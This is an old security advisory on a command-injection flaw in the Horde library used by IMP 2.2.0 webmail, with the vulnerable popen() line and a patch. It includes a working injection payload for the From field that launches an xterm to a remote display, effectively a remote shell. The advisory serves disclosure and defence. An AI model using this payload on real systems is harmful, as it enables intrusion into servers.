COMMAND

    IMP

SYSTEMS AFFECTED

    IMP 2.2.0

PROBLEM

    Christian Winter  found following.   This is  intended as  a paper
    for sysadmins who want to secure  their systems.  It is NOT  a how
    to for scriptkiddies to run any attack on a IMP-using site.

    The authors  of this  text will  not be  held responsible  for any
    damage resulting  from others  using the  documented exploits  for
    attacking or invading 3rd parties' computers or networks.

    Bug  found  and  exploited  by  Jens  "atomi"  Steube.   Fixed and
    documentated by Christian "thepoet" Winter.

    The bug was found in the horde library code of Horde 1.2.0.  Other
    versions haven't been checked yet.  If you are in doubt that  your
    version  is  also  buggy,  please  contact  the  horde  authors as
    described on http://horde.org.

    The $from-bug is in the horde library file 'horde.lib', (on debian
    systems installed in /usr/share/horde/lib/horde.lib) in line  1108
    belonging to function  "mailfrom".  In  this file there  is a call
    to  "popen"  with  an  unchecked  "from:"-line as argument.  Exact
    syntax is:

        $mail = popen("$default->path_to_sendmail -i -f$from --$recipients", 'w');

    If  the  user  passes  a  string  containing  the  "&" char to the
    function as $from, commands can be executed under the uid and  gid
    the webserver is running as.

    Usually  the  horde.lib/mailfrom  function  is  called  by the IMP
    webmail interface.  As IMP also  does not check for the "&"  char,
    it  is  passed  on  to   popen().   There  are  also  some   other
    software-projects  using  the  hordelib  -  they  also  could   be
    exploited by the same means.

        1) Just open an IMP and press Compose to write a new mail
        2) As your From-EMail Adress an exploit $from-line could be:
           &"/usr/X11R6/bin/xterm -display 127.0.0.1:0.0"&
           (Remember most people  should replace 127.0.0.1  with their
           own IP  and also  verify the  path to  xterm) or  any other
           command you want.
        3) enter a recipient
        4) Send message, done.

SOLUTION

    The horde library already  provides a function that  prevents this
    kind of exploits,  called "escapeShellCmd".   It is used  with the
    "$recipients" var but not with "$from".

    To  secure  the  installed  horde  it  is  sufficient  to  add the
    following line 1108 in /usr/share/horde/lib/horde.lib:

        $from = escapeShellCmd( $from );

    or download a patch form:

        http://ssl.coc-ag.de/sec/hordelib-1.2.0.frombug.patch

    The included fix  has been applied  to the CVS  code for both  the
    Horde 1.2 branch  and the Horde  1.3 branch (development).   Horde
    1.2.1 and IMP  2.2.1 will have  this fixed.   In addition to  this
    fix, the  new releases  will also  include a  number of  small bug
    fixes and improvements.

    For Debian:

        http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.dsc
        http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.tar.gz
        http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.dsc
        http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-all/horde_1.2.1-0_all.deb
        http://security.debian.org/dists/stable/updates/main/binary-all/imp_2.2.1-0_all.deb